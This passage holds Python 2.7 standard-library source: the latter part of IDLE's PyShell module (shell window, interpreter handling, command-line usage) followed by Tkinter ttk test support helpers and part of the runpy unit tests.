pos = "iomark + %d chars" % (offset-1)
else:
pos = "iomark linestart + %d lines + %d chars" % \
(lineno-1, offset-1)
text.tag_add("ERROR", pos)
text.see(pos)
char = text.get(pos)
if char and char in IDENTCHARS:
text.tag_add("ERROR", pos + " wordstart", pos)
self.tkconsole.resetoutput()
self.write("SyntaxError: %s\n" % str(msg))
else:
self.tkconsole.resetoutput()
InteractiveInterpreter.showsyntaxerror(self, filename)
self.tkconsole.showprompt()
def unpackerror(self):
type, value, tb = sys.exc_info()
ok = type is SyntaxError
if ok:
try:
msg, (dummy_filename, lineno, offset, line) = value
if not offset:
offset = 0
except:
ok = 0
if ok:
return msg, lineno, offset, line
else:
return None
def showtraceback(self):
"Extend base class method to reset output properly"
self.tkconsole.resetoutput()
self.checklinecache()
InteractiveInterpreter.showtraceback(self)
if self.tkconsole.getvar("<<toggle-jit-stack-viewer>>"):
self.tkconsole.open_stack_viewer()
def checklinecache(self):
c = linecache.cache
for key in c.keys():
if key[:1] + key[-1:] != "<>":
del c[key]
def runcommand(self, code):
"Run the code without invoking the debugger"
# The code better not raise an exception!
if self.tkconsole.executing:
self.display_executing_dialog()
return 0
if self.rpcclt:
self.rpcclt.remotequeue("exec", "runcode", (code,), {})
else:
exec code in self.locals
return 1
def runcode(self, code):
"Override base class method"
if self.tkconsole.executing:
self.interp.restart_subprocess()
self.checklinecache()
if self.save_warnings_filters is not None:
warnings.filters[:] = self.save_warnings_filters
self.save_warnings_filters = None
debugger = self.debugger
try:
self.tkconsole.beginexecuting()
if not debugger and self.rpcclt is not None:
self.active_seq = self.rpcclt.asyncqueue("exec", "runcode",
(code,), {})
elif debugger:
debugger.run(code, self.locals)
else:
exec code in self.locals
except SystemExit:
if not self.tkconsole.closing:
if tkMessageBox.askyesno(
"Exit?",
"Do you want to exit altogether?",
default="yes",
master=self.tkconsole.text):
raise
else:
self.showtraceback()
else:
raise
except:
if use_subprocess:
print >>self.tkconsole.stderr, \
"IDLE internal error in runcode()"
self.showtraceback()
self.tkconsole.endexecuting()
else:
if self.tkconsole.canceled:
self.tkconsole.canceled = False
print >>self.tkconsole.stderr, "KeyboardInterrupt"
else:
self.showtraceback()
finally:
if not use_subprocess:
try:
self.tkconsole.endexecuting()
except AttributeError: # shell may have closed
pass
def write(self, s):
"Override base class method"
self.tkconsole.stderr.write(s)
def display_port_binding_error(self):
tkMessageBox.showerror(
"Port Binding Error",
"IDLE can't bind to a TCP/IP port, which is necessary to "
"communicate with its Python execution server. This might be "
"because no networking is installed on this computer. "
"Run IDLE with the -n command line switch to start without a "
"subprocess and refer to Help/IDLE Help 'Running without a "
"subprocess' for further details.",
master=self.tkconsole.text)
def display_no_subprocess_error(self):
tkMessageBox.showerror(
"Subprocess Startup Error",
"IDLE's subprocess didn't make connection. Either IDLE can't "
"start a subprocess or personal firewall software is blocking "
"the connection.",
master=self.tkconsole.text)
def display_executing_dialog(self):
tkMessageBox.showerror(
"Already executing",
"The Python Shell window is already executing a command; "
"please wait until it is finished.",
master=self.tkconsole.text)
class PyShell(OutputWindow):
shell_title = "Python Shell"
# Override classes
ColorDelegator = ModifiedColorDelegator
UndoDelegator = ModifiedUndoDelegator
# Override menus
menu_specs = [
("file", "_File"),
("edit", "_Edit"),
("debug", "_Debug"),
("options", "_Options"),
("windows", "_Windows"),
("help", "_Help"),
]
if macosxSupport.runningAsOSXApp():
del menu_specs[-3]
menu_specs[-2] = ("windows", "_Window")
# New classes
from idlelib.IdleHistory import History
def __init__(self, flist=None):
if use_subprocess:
ms = self.menu_specs
if ms[2][0] != "shell":
ms.insert(2, ("shell", "She_ll"))
self.interp = ModifiedInterpreter(self)
if flist is None:
root = Tk()
fixwordbreaks(root)
root.withdraw()
flist = PyShellFileList(root)
#
OutputWindow.__init__(self, flist, None, None)
#
## self.config(usetabs=1, indentwidth=8, context_use_ps1=1)
self.usetabs = True
# indentwidth must be 8 when using tabs. See note in EditorWindow:
self.indentwidth = 8
self.context_use_ps1 = True
#
text = self.text
text.configure(wrap="char")
text.bind("<<newline-and-indent>>", self.enter_callback)
text.bind("<<plain-newline-and-indent>>", self.linefeed_callback)
text.bind("<<interrupt-execution>>", self.cancel_callback)
text.bind("<<end-of-file>>", self.eof_callback)
text.bind("<<open-stack-viewer>>", self.open_stack_viewer)
text.bind("<<toggle-debugger>>", self.toggle_debugger)
text.bind("<<toggle-jit-stack-viewer>>", self.toggle_jit_stack_viewer)
if use_subprocess:
text.bind("<<view-restart>>", self.view_restart_mark)
text.bind("<<restart-shell>>", self.restart_shell)
#
self.save_stdout = sys.stdout
self.save_stderr = sys.stderr
self.save_stdin = sys.stdin
from idlelib import IOBinding
self.stdin = PseudoInputFile(self, "stdin", IOBinding.encoding)
self.stdout = PseudoOutputFile(self, "stdout", IOBinding.encoding)
self.stderr = PseudoOutputFile(self, "stderr", IOBinding.encoding)
self.console = PseudoOutputFile(self, "console", IOBinding.encoding)
if not use_subprocess:
sys.stdout = self.stdout
sys.stderr = self.stderr
sys.stdin = self.stdin
#
self.history = self.History(self.text)
#
self.pollinterval = 50 # millisec
def get_standard_extension_names(self):
return idleConf.GetExtensions(shell_only=True)
reading = False
executing = False
canceled = False
endoffile = False
closing = False
def set_warning_stream(self, stream):
global warning_stream
warning_stream = stream
def get_warning_stream(self):
return warning_stream
def toggle_debugger(self, event=None):
if self.executing:
tkMessageBox.showerror("Don't debug now",
"You can only toggle the debugger when idle",
master=self.text)
self.set_debugger_indicator()
return "break"
else:
db = self.interp.getdebugger()
if db:
self.close_debugger()
else:
self.open_debugger()
def set_debugger_indicator(self):
db = self.interp.getdebugger()
self.setvar("<<toggle-debugger>>", not not db)
def toggle_jit_stack_viewer(self, event=None):
pass # All we need is the variable
def close_debugger(self):
db = self.interp.getdebugger()
if db:
self.interp.setdebugger(None)
db.close()
if self.interp.rpcclt:
RemoteDebugger.close_remote_debugger(self.interp.rpcclt)
self.resetoutput()
self.console.write("[DEBUG OFF]\n")
sys.ps1 = ">>> "
self.showprompt()
self.set_debugger_indicator()
def open_debugger(self):
if self.interp.rpcclt:
dbg_gui = RemoteDebugger.start_remote_debugger(self.interp.rpcclt,
self)
else:
dbg_gui = Debugger.Debugger(self)
self.interp.setdebugger(dbg_gui)
dbg_gui.load_breakpoints()
sys.ps1 = "[DEBUG ON]\n>>> "
self.showprompt()
self.set_debugger_indicator()
def beginexecuting(self):
"Helper for ModifiedInterpreter"
self.resetoutput()
self.executing = 1
def endexecuting(self):
"Helper for ModifiedInterpreter"
self.executing = 0
self.canceled = 0
self.showprompt()
def close(self):
"Extend EditorWindow.close()"
if self.executing:
response = tkMessageBox.askokcancel(
"Kill?",
"The program is still running!\n Do you want to kill it?",
default="ok",
parent=self.text)
if response is False:
return "cancel"
if self.reading:
self.top.quit()
self.canceled = True
self.closing = True
# Wait for poll_subprocess() rescheduling to stop
self.text.after(2 * self.pollinterval, self.close2)
def close2(self):
return EditorWindow.close(self)
def _close(self):
"Extend EditorWindow._close(), shut down debugger and execution server"
self.close_debugger()
if use_subprocess:
self.interp.kill_subprocess()
# Restore std streams
sys.stdout = self.save_stdout
sys.stderr = self.save_stderr
sys.stdin = self.save_stdin
# Break cycles
self.interp = None
self.console = None
self.flist.pyshell = None
self.history = None
EditorWindow._close(self)
def ispythonsource(self, filename):
"Override EditorWindow method: never remove the colorizer"
return True
def short_title(self):
return self.shell_title
COPYRIGHT = \
'Type "copyright", "credits" or "license()" for more information.'
def begin(self):
self.resetoutput()
if use_subprocess:
nosub = ''
client = self.interp.start_subprocess()
if not client:
self.close()
return False
else:
nosub = "==== No Subprocess ===="
self.write("Python %s on %s\n%s\n%s" %
(sys.version, sys.platform, self.COPYRIGHT, nosub))
self.showprompt()
import Tkinter
Tkinter._default_root = None # 03Jan04 KBK What's this?
return True
def readline(self):
save = self.reading
try:
self.reading = 1
self.top.mainloop() # nested mainloop()
finally:
self.reading = save
line = self.text.get("iomark", "end-1c")
if len(line) == 0: # may be EOF if we quit our mainloop with Ctrl-C
line = "\n"
if isinstance(line, unicode):
from idlelib import IOBinding
try:
line = line.encode(IOBinding.encoding)
except UnicodeError:
pass
self.resetoutput()
if self.canceled:
self.canceled = 0
if not use_subprocess:
raise KeyboardInterrupt
if self.endoffile:
self.endoffile = 0
line = ""
return line
def isatty(self):
return True
def cancel_callback(self, event=None):
try:
if self.text.compare("sel.first", "!=", "sel.last"):
return # Active selection -- always use default binding
except:
pass
if not (self.executing or self.reading):
self.resetoutput()
self.interp.write("KeyboardInterrupt\n")
self.showprompt()
return "break"
self.endoffile = 0
self.canceled = 1
if (self.executing and self.interp.rpcclt):
if self.interp.getdebugger():
self.interp.restart_subprocess()
else:
self.interp.interrupt_subprocess()
if self.reading:
self.top.quit() # exit the nested mainloop() in readline()
return "break"
def eof_callback(self, event):
if self.executing and not self.reading:
return # Let the default binding (delete next char) take over
if not (self.text.compare("iomark", "==", "insert") and
self.text.compare("insert", "==", "end-1c")):
return # Let the default binding (delete next char) take over
if not self.executing:
self.resetoutput()
self.close()
else:
self.canceled = 0
self.endoffile = 1
self.top.quit()
return "break"
def linefeed_callback(self, event):
# Insert a linefeed without entering anything (still autoindented)
if self.reading:
self.text.insert("insert", "\n")
self.text.see("insert")
else:
self.newline_and_indent_event(event)
return "break"
def enter_callback(self, event):
if self.executing and not self.reading:
return # Let the default binding (insert '\n') take over
# If some text is selected, recall the selection
# (but only if this before the I/O mark)
try:
sel = self.text.get("sel.first", "sel.last")
if sel:
if self.text.compare("sel.last", "<=", "iomark"):
self.recall(sel, event)
return "break"
except:
pass
# If we're strictly before the line containing iomark, recall
# the current line, less a leading prompt, less leading or
# trailing whitespace
if self.text.compare("insert", "<", "iomark linestart"):
# Check if there's a relevant stdin range -- if so, use it
prev = self.text.tag_prevrange("stdin", "insert")
if prev and self.text.compare("insert", "<", prev[1]):
self.recall(self.text.get(prev[0], prev[1]), event)
return "break"
next = self.text.tag_nextrange("stdin", "insert")
if next and self.text.compare("insert lineend", ">=", next[0]):
self.recall(self.text.get(next[0], next[1]), event)
return "break"
# No stdin mark -- just get the current line, less any prompt
indices = self.text.tag_nextrange("console", "insert linestart")
if indices and \
self.text.compare(indices[0], "<=", "insert linestart"):
self.recall(self.text.get(indices[1], "insert lineend"), event)
else:
self.recall(self.text.get("insert linestart", "insert lineend"), event)
return "break"
# If we're between the beginning of the line and the iomark, i.e.
# in the prompt area, move to the end of the prompt
if self.text.compare("insert", "<", "iomark"):
self.text.mark_set("insert", "iomark")
# If we're in the current input and there's only whitespace
# beyond the cursor, erase that whitespace first
s = self.text.get("insert", "end-1c")
if s and not s.strip():
self.text.delete("insert", "end-1c")
# If we're in the current input before its last line,
# insert a newline right at the insert point
if self.text.compare("insert", "<", "end-1c linestart"):
self.newline_and_indent_event(event)
return "break"
# We're in the last line; append a newline and submit it
self.text.mark_set("insert", "end-1c")
if self.reading:
self.text.insert("insert", "\n")
self.text.see("insert")
else:
self.newline_and_indent_event(event)
self.text.tag_add("stdin", "iomark", "end-1c")
self.text.update_idletasks()
if self.reading:
self.top.quit() # Break out of recursive mainloop() in raw_input()
else:
self.runit()
return "break"
def recall(self, s, event):
# remove leading and trailing empty or whitespace lines
s = re.sub(r'^\s*\n', '' , s)
s = re.sub(r'\n\s*$', '', s)
lines = s.split('\n')
self.text.undo_block_start()
try:
self.text.tag_remove("sel", "1.0", "end")
self.text.mark_set("insert", "end-1c")
prefix = self.text.get("insert linestart", "insert")
if prefix.rstrip().endswith(':'):
self.newline_and_indent_event(event)
prefix = self.text.get("insert linestart", "insert")
self.text.insert("insert", lines[0].strip())
if len(lines) > 1:
orig_base_indent = re.search(r'^([ \t]*)', lines[0]).group(0)
new_base_indent = re.search(r'^([ \t]*)', prefix).group(0)
for line in lines[1:]:
if line.startswith(orig_base_indent):
# replace orig base indentation with new indentation
line = new_base_indent + line[len(orig_base_indent):]
self.text.insert('insert', '\n'+line.rstrip())
finally:
self.text.see("insert")
self.text.undo_block_stop()
def runit(self):
line = self.text.get("iomark", "end-1c")
# Strip off last newline and surrounding whitespace.
# (To allow you to hit return twice to end a statement.)
i = len(line)
while i > 0 and line[i-1] in " \t":
i = i-1
if i > 0 and line[i-1] == "\n":
i = i-1
while i > 0 and line[i-1] in " \t":
i = i-1
line = line[:i]
more = self.interp.runsource(line)
def open_stack_viewer(self, event=None):
if self.interp.rpcclt:
return self.interp.remote_stack_viewer()
try:
sys.last_traceback
except:
tkMessageBox.showerror("No stack trace",
"There is no stack trace yet.\n"
"(sys.last_traceback is not defined)",
master=self.text)
return
from idlelib.StackViewer import StackBrowser
sv = StackBrowser(self.root, self.flist)
def view_restart_mark(self, event=None):
self.text.see("iomark")
self.text.see("restart")
def restart_shell(self, event=None):
"Callback for Run/Restart Shell Cntl-F6"
self.interp.restart_subprocess(with_cwd=True)
def showprompt(self):
self.resetoutput()
try:
s = str(sys.ps1)
except:
s = ""
self.console.write(s)
self.text.mark_set("insert", "end-1c")
self.set_line_and_column()
self.io.reset_undo()
def resetoutput(self):
source = self.text.get("iomark", "end-1c")
if self.history:
self.history.history_store(source)
if self.text.get("end-2c") != "\n":
self.text.insert("end-1c", "\n")
self.text.mark_set("iomark", "end-1c")
self.set_line_and_column()
sys.stdout.softspace = 0
def write(self, s, tags=()):
try:
self.text.mark_gravity("iomark", "right")
OutputWindow.write(self, s, tags, "iomark")
self.text.mark_gravity("iomark", "left")
except:
pass
if self.canceled:
self.canceled = 0
if not use_subprocess:
raise KeyboardInterrupt
def rmenu_check_cut(self):
try:
if self.text.compare('sel.first', '<', 'iomark'):
return 'disabled'
except TclError: # no selection, so the index 'sel.first' doesn't exist
return 'disabled'
return super(PyShell, self).rmenu_check_cut()
def rmenu_check_paste(self):
if self.text.compare('insert', '<', 'iomark'):
return 'disabled'
return super(PyShell, self).rmenu_check_paste()
class PseudoFile(io.TextIOBase):
def __init__(self, shell, tags, encoding=None):
self.shell = shell
self.tags = tags
self.softspace = 0
self._encoding = encoding
@property
def encoding(self):
return self._encoding
@property
def name(self):
return '<%s>' % self.tags
def isatty(self):
return True
class PseudoOutputFile(PseudoFile):
def writable(self):
return True
def write(self, s):
if self.closed:
raise ValueError("write to closed file")
if not isinstance(s, (basestring, bytearray)):
raise TypeError('must be string, not ' + type(s).__name__)
return self.shell.write(s, self.tags)
class PseudoInputFile(PseudoFile):
def __init__(self, shell, tags, encoding=None):
PseudoFile.__init__(self, shell, tags, encoding)
self._line_buffer = ''
def readable(self):
return True
def read(self, size=-1):
if self.closed:
raise ValueError("read from closed file")
if size is None:
size = -1
elif not isinstance(size, int):
raise TypeError('must be int, not ' + type(size).__name__)
result = self._line_buffer
self._line_buffer = ''
if size < 0:
while True:
line = self.shell.readline()
if not line: break
result += line
else:
while len(result) < size:
line = self.shell.readline()
if not line: break
result += line
self._line_buffer = result[size:]
result = result[:size]
return result
def readline(self, size=-1):
if self.closed:
raise ValueError("read from closed file")
if size is None:
size = -1
elif not isinstance(size, int):
raise TypeError('must be int, not ' + type(size).__name__)
line = self._line_buffer or self.shell.readline()
if size < 0:
size = len(line)
self._line_buffer = line[size:]
return line[:size]
usage_msg = """\
USAGE: idle [-deins] [-t title] [file]*
idle [-dns] [-t title] (-c cmd | -r file) [arg]*
idle [-dns] [-t title] - [arg]*
-h print this help message and exit
-n run IDLE without a subprocess (see Help/IDLE Help for details)
The following options will override the IDLE 'settings' configuration:
-e open an edit window
-i open a shell window
The following options imply -i and will open a shell:
-c cmd run the command in a shell, or
-r file run script from file
-d enable the debugger
-s run $IDLESTARTUP or $PYTHONSTARTUP before anything else
-t title set title of shell window
A default edit window will be bypassed when -c, -r, or - are used.
[arg]* are passed to the command (-c) or script (-r) in sys.argv[1:].
Examples:
idle
Open an edit window or shell depending on IDLE's configuration.
idle foo.py foobar.py
Edit the files, also open a shell if configured to start with shell.
idle -est "Baz" foo.py
Run $IDLESTARTUP or $PYTHONSTARTUP, edit foo.py, and open a shell
window with the title "Baz".
idle -c "import sys; print sys.argv" "foo"
Open a shell window and run the command, passing "-c" in sys.argv[0]
and "foo" in sys.argv[1].
idle -d -s -r foo.py "Hello World"
Open a shell window, run a startup script, enable the debugger, and
run foo.py, passing "foo.py" in sys.argv[0] and "Hello World" in
sys.argv[1].
echo "import sys; print sys.argv" | idle - "foobar"
Open a shell window, run the script piped in, passing '' in sys.argv[0]
and "foobar" in sys.argv[1].
"""
def main():
global flist, root, use_subprocess
use_subprocess = True
enable_shell = True
enable_edit = False
debug = False
cmd = None
script = None
startup = False
try:
opts, args = getopt.getopt(sys.argv[1:], "c:deihnr:st:")
except getopt.error, msg:
sys.stderr.write("Error: %s\n" % str(msg))
sys.stderr.write(usage_msg)
sys.exit(2)
for o, a in opts:
if o == '-c':
cmd = a
enable_shell = True
if o == '-d':
debug = True
enable_shell = True
if o == '-e':
enable_edit = True
enable_shell = False
if o == '-h':
sys.stdout.write(usage_msg)
sys.exit()
if o == '-i':
enable_shell = True
if o == '-n':
use_subprocess = False
if o == '-r':
script = a
if os.path.isfile(script):
pass
else:
print "No script file: ", script
sys.exit()
enable_shell = True
if o == '-s':
startup = True
enable_shell = True
if o == '-t':
PyShell.shell_title = a
enable_shell = True
if args and args[0] == '-':
cmd = sys.stdin.read()
enable_shell = True
# process sys.argv and sys.path:
for i in range(len(sys.path)):
sys.path[i] = os.path.abspath(sys.path[i])
if args and args[0] == '-':
sys.argv = [''] + args[1:]
elif cmd:
sys.argv = ['-c'] + args
elif script:
sys.argv = [script] + args
elif args:
enable_edit = True
pathx = []
for filename in args:
pathx.append(os.path.dirname(filename))
for dir in pathx:
dir = os.path.abspath(dir)
if dir not in sys.path:
sys.path.insert(0, dir)
else:
dir = os.getcwd()
if not dir in sys.path:
sys.path.insert(0, dir)
# check the IDLE settings configuration (but command line overrides)
edit_start = idleConf.GetOption('main', 'General',
'editor-on-startup', type='bool')
enable_edit = enable_edit or edit_start
# start editor and/or shell windows:
root = Tk(className="Idle")
fixwordbreaks(root)
root.withdraw()
flist = PyShellFileList(root)
macosxSupport.setupApp(root, flist)
if enable_edit:
if not (cmd or script):
for filename in args[:]:
if flist.open(filename) is None:
# filename is a directory actually, disconsider it
args.remove(filename)
if not args:
flist.new()
if enable_shell:
shell = flist.open_shell()
if not shell:
return # couldn't open shell
if macosxSupport.runningAsOSXApp() and flist.dict:
# On OSX: when the user has double-clicked on a file that causes
# IDLE to be launched the shell window will open just in front of
# the file she wants to see. Lower the interpreter window when
# there are open files.
shell.top.lower()
shell = flist.pyshell
# handle remaining options:
if debug:
shell.open_debugger()
if startup:
filename = os.environ.get("IDLESTARTUP") or \
os.environ.get("PYTHONSTARTUP")
if filename and os.path.isfile(filename):
shell.interp.execfile(filename)
if shell and cmd or script:
shell.interp.runcommand("""if 1:
import sys as _sys
_sys.argv = %r
del _sys
\n""" % (sys.argv,))
if cmd:
shell.interp.execsource(cmd)
elif script:
shell.interp.prepend_syspath(script)
shell.interp.execfile(script)
# Check for problematic OS X Tk versions and print a warning message
# in the IDLE shell window; this is less intrusive than always opening
# a separate window.
tkversionwarning = macosxSupport.tkVersionWarning(root)
if tkversionwarning:
shell.interp.runcommand(''.join(("print('", tkversionwarning, "')")))
while flist.inversedict: # keep IDLE running while files are open.
root.mainloop()
root.destroy()
if __name__ == "__main__":
sys.modules['PyShell'] = sys.modules['__main__']
main()
```
#### File: test/test_ttk/support.py
```python
import Tkinter
def get_tk_root():
try:
root = Tkinter._default_root
except AttributeError:
# it is possible to disable default root in Tkinter, although
# I haven't seen people doing it (but apparently someone did it
# here).
root = None
if root is None:
# create a new master only if there isn't one already
root = Tkinter.Tk()
return root
def root_deiconify():
root = get_tk_root()
root.deiconify()
def root_withdraw():
root = get_tk_root()
root.withdraw()
def simulate_mouse_click(widget, x, y):
"""Generate proper events to click at the x, y position (tries to act
like an X server)."""
widget.event_generate('<Enter>', x=0, y=0)
widget.event_generate('<Motion>', x=x, y=y)
widget.event_generate('<ButtonPress-1>', x=x, y=y)
widget.event_generate('<ButtonRelease-1>', x=x, y=y)
```
#### File: 2.7/test/test_runpy.py
```python
import unittest
import os
import os.path
import sys
import re
import tempfile
from test.test_support import verbose, run_unittest, forget
from test.script_helper import (temp_dir, make_script, compile_script,
make_pkg, make_zip_script, make_zip_pkg)
from runpy import _run_code, _run_module_code, run_module, run_path
# Note: This module can't safely test _run_module_as_main as it
# runs its tests in the current process, which would mess with the
# real __main__ module (usually test.regrtest)
# See test_cmd_line_script for a test that executes that code path
# Set up the test code and expected results
class RunModuleCodeTest(unittest.TestCase):
"""Unit tests for runpy._run_code and runpy._run_module_code"""
expected_result = ["Top level assignment", "Lower level reference"]
test_source = (
"# Check basic code execution\n"
"result = ['Top level assignment']\n"
"def f():\n"
" result.append('Lower level reference')\n"
"f()\n"
"# Check the sys module\n"
"import sys\n"
"run_argv0 = sys.argv[0]\n"
"run_name_in_sys_modules = __name__ in sys.modules\n"
"if run_name_in_sys_modules:\n"
" module_in_sys_modules = globals() is sys.modules[__name__].__dict__\n"
"# Check nested operation\n"
"import runpy\n"
"nested = runpy._run_module_code('x=1\\n', mod_name='<run>')\n"
)
def test_run_code(self):
saved_argv0 = sys.argv[0]
d = _run_code(self.test_source, {})
self.assertEqual(d["result"], self.expected_result)
self.assertIs(d["__name__"], None)
self.assertIs(d["__file__"], None)
self.assertIs(d["__loader__"], None)
self.assertIs(d["__package__"], None)
self.assertIs(d["run_argv0"], saved_argv0)
self.assertNotIn("run_name", d)
self.assertIs(sys.argv[0], saved_argv0)
def test_run_module_code(self):
initial = object()
name = "<Nonsense>"
file = "Some other nonsense"
loader = "Now you're just being silly"
package = '' # Treat as a top level module
d1 = dict(initial=initial)
saved_argv0 = sys.argv[0]
d2 = _run_module_code(self.test_source,
d1,
name,
file,
loader,
package)
self.assertNotIn("result", d1)
self.assertIs(d2["initial"], initial)
self.assertEqual(d2["result"], self.expected_result)
self.assertEqual(d2["nested"]["x"], 1)
self.assertIs(d2["__name__"], name)
self.assertTrue(d2["run_name_in_sys_modules"])
self.assertTrue(d2["module_in_sys_modules"])
self.assertIs(d2["__file__"], file)
self.assertIs(d2["run_argv0"], file)
self.assertIs(d2["__loader__"], loader)
self.assertIs(d2["__package__"], package)
self.assertIs(sys.argv[0], saved_argv0)
self.assertNotIn(name, sys.modules)
class RunModuleTest(unittest.TestCase):
"""Unit tests for runpy.run_module"""
def expect_import_error(self, mod_name):
try:
run_module(mod_name)
except ImportError:
pass
else:
self.fail("Expected import error for " + mod_name)
def test_invalid_names(self):
# Builtin module
self.expect_import_error("sys")
# Non-existent modules
self.expect_import_error("sys.imp.eric")
self.expect_import_error("os.path.half")
self.expect_import_error("a.bee")
self.expect_import_error(".howard")
self.expect_import_error("..eaten")
# Package without __main__.py
self.expect_import_error("multiprocessing")
def test_library_module(self):
run_module("runpy")
def _add_pkg_dir(self, pkg_dir):
os.mkdir(pkg_dir)
pkg_fname = os.path.join(pkg_dir, "__init__"+os.extsep+"py")
pkg_file = open(pkg_fname, "w")
pkg_file.close()
return pkg_fname
def _make_pkg(self, source, depth, mod_base="runpy_test"):
pkg_name = "__runpy_pkg__"
test_fname = mod_base+os.extsep+"py"
pkg_dir = sub_dir = tempfile.mkdtemp()
if verbose: print " Package tree in:", sub_dir
sys.path.insert(0, pkg_dir)
if verbose: print " Updated sys.path:", sys.path[0]
for i in range(depth):
sub_dir = os.path.join(sub_dir, pkg_name)
pkg_fname = self._add_pkg_dir(sub_dir)
if verbose: print " Next level in:", sub_dir
if verbose: print " Created:", pkg_fname
mod_fname = os.path.join(sub_dir, test_fname)
mod_file = open(mod_fname, "w")
mod_file.write(source)
mod_file.close()
if verbose: print " Created:", mod_fname
mod_name = (pkg_name+".")*depth + mod_base
return pkg_dir, mod_fname, mod_name
def _del_pkg(self, top, depth, mod_name):
for entry in list(sys.modules):
if entry.startswith("__runpy_pkg__"):
del sys.modules[entry]
if verbose: print " Removed sys.modules entries"
del sys.path[0]
if verbose: print " Removed sys.path entry"
for root, dirs, files in os.walk(top, topdown=False):
for name in files:
try:
os.remove(os.path.join(root, name))
except OSError, ex:
if verbose: print ex # Persist with cleaning up
for name in dirs:
fullname = os.path.join(root, name)
try:
os.rmdir(fullname)
except OSError, ex:
if verbose: print ex # Persist with cleaning up
try:
os.rmdir(top)
if verbose: print " Removed package tree"
except OSError, ex:
if verbose: print ex # Persist with cleaning up
def _check_module(self, depth):
pkg_dir, mod_fname, mod_name = (
self._make_pkg("x=1\n", depth))
forget(mod_name)
try:
if verbose: print "Running from source:", mod_name
d1 = run_module(mod_name) # Read from source
self.assertIn("x", d1)
self.assertTrue(d1["x"] == 1)
del d1 # Ensure __loader__ entry doesn't keep file open
__import__(mod_name)
os.remove(mod_fname)
if verbose: print "Running from compiled:", mod_name
d2 = run_module(mod_name) # Read from bytecode
self.assertIn("x", d2)
self.assertTrue(d2["x"] == 1)
del d2 # Ensure __loader__ entry doesn't keep file open
finally:
self._del_pkg(pkg_dir, depth, mod_name)
if verbose: print "Module executed successfully"
def _check_package(self, depth):
pkg_dir, mod_fname, mod_name = (
self._make_pkg("x=1\n", depth, "__main__"))
pkg_name, _, _ = mod_name.rpartition(".")
forget(mod_name)
try:
if verbose: print "Running from source:", pkg_name
d1 = run_module(pkg_name) # Read from source
self.assertIn("x", d1)
self.assertTrue(d1["x"] == 1)
del d1 # Ensure __loader__ entry doesn't keep file open
__import__(mod_name)
os.remove(mod_fname)
if verbose: print "Running from compiled:", pkg_name
d2 = run_module(pkg_name) # Read from bytecode
self.assertIn("x", d2)
self.assertTrue(d2["x"] == 1)
del d2 # Ensure __loader__ entry doesn't keep file open
finally:
self._del_pkg(pkg_dir, depth, pkg_name)
if verbose: print "Package executed successfully"
def _add_relative_modules(self, base_dir, source, depth):
if depth <= 1:
raise ValueError("Relative module test needs depth > 1")
pkg_name = "__runpy_pkg__"
module_dir = base_dir
for i in range(depth):
parent_dir = module_dir
module_dir = os.path.join(module_dir, pkg_name)
# Add sibling module
sibling_fname = os.path.join(module_dir, "sibling"+os.extsep+"py")
sibling_file = open(sibling_fname, "w")
sibling_file.close()
if verbose: print " Added sibling module:", sibling_fname
# Add nephew module
uncle_dir = os.path.join(parent_dir, "uncle")
self._add_pkg_dir(uncle_dir)
if verbose: print " Added uncle package:", uncle_dir
cousin_dir = os.path.join(uncle_dir, "cousin")
self._add_pkg_dir(cousin_dir)
if verbose: print " Added cousin package:", cousin_dir
nephew_fname = os.path.join(cousin_dir, "nephew"+os.extsep+"py")
nephew_file = open(nephew_fname, "w")
nephew_file.close()
if verbose: print " Added nephew module:", nephew_fname
def _check_relative_imports(self, depth, run_name=None):
contents = r"""\
from __future__ import absolute_import
from . import sibling
from ..uncle.cousin import nephew
"""
pkg_dir, mod_fname, mod_name = (
self._make_pkg(contents, depth))
try:
self._add_relative_modules(pkg_dir, contents, depth)
pkg_name = mod_name.rpartition('.')[0]
if verbose: print "Running from source:", mod_name
d1 = run_module(mod_name, run_name=run_name) # Read from source
self.assertIn("__package__", d1)
self.assertTrue(d1["__package__"] == pkg_name)
self.assertIn("sibling", d1)
self.assertIn("nephew", d1)
del d1 # Ensure __loader__ entry doesn't keep file open
__import__(mod_name)
os.remove(mod_fname)
if verbose: print "Running from compiled:", mod_name
d2 = run_module(mod_name, run_name=run_name) # Read from bytecode
self.assertIn("__package__", d2)
self.assertTrue(d2["__package__"] == pkg_name)
self.assertIn("sibling", d2)
self.assertIn("nephew", d2)
del d2 # Ensure __loader__ entry doesn't keep file open
finally:
self._del_pkg(pkg_dir, depth, mod_name)
if verbose: print "Module executed successfully"
def test_run_module(self):
for depth in range(4):
if verbose: print "Testing package depth:", depth
self._check_module(depth)
def test_run_package(self):
for depth in range(1, 4):
if verbose: print "Testing package depth:", depth
self._check_package(depth)
def test_explicit_relative_import(self):
for depth in range(2, 5):
if verbose: print "Testing relative imports at depth:", depth
self._check_relative_imports(depth)
def test_main_relative_import(self):
for depth in range(2, 5):
if verbose: print "Testing main relative imports at depth:", depth
self._check_relative_imports(depth, "__main__")
class RunPathTest(unittest.TestCase):
"""Unit tests for runpy.run_path"""
# Based on corresponding tests in test_cmd_line_script
test_source = """\
# Script may be run with optimisation enabled, so don't rely on assert
# statements being executed
def assertEqual(lhs, rhs):
if lhs != rhs:
raise AssertionError('%r != %r' % (lhs, rhs))
def assertIs(lhs, rhs):
if lhs is not rhs:
raise AssertionError('%r is not %r' % (lhs, rhs))
# Check basic code execution
result = ['Top level assignment']
def f():
result.append('Lower level reference')
f()
assertEqual(result, ['Top level assignment', 'Lower level reference'])
# Check the sys module
import sys
assertIs(globals(), sys.modules[__name__].__dict__)
argv0 = sys.argv[0]
"""
def _make_test_script(self, script_dir, script_basename, source=None):
if source is None:
source = self.test_source
return make_script(script_dir, script_basename, source)
def _check_script(self, script_name, expected_name, expected_file,
expected_argv0, expected_package):
result = run_path(script_name)
self.assertEqual(result["__name__"], expected_name)
self.assertEqual(result["__file__"], expected_file)
self.assertIn("argv0", result)
self.assertEqual(result["argv0"], expected_argv0)
self.assertEqual(result["__package__"], expected_package)
def _check_import_error(self, script_name, msg):
msg = re.escape(msg)
self.assertRaisesRegexp(ImportError, msg, run_path, script_name)
def test_basic_script(self):
with temp_dir() as script_dir:
mod_name = 'script'
script_name = self._make_test_script(script_dir, mod_name)
self._check_script(script_name, "<run_path>", script_name,
script_name, None)
def test_script_compiled(self):
with temp_dir() as script_dir:
mod_name = 'script'
script_name = self._make_test_script(script_dir, mod_name)
compiled_name = compile_script(script_name)
os.remove(script_name)
self._check_script(compiled_name, "<run_path>", compiled_name,
compiled_name, None)
def test_directory(self):
with temp_dir() as script_dir:
mod_name = '__main__'
script_name = self._make_test_script(script_dir, mod_name)
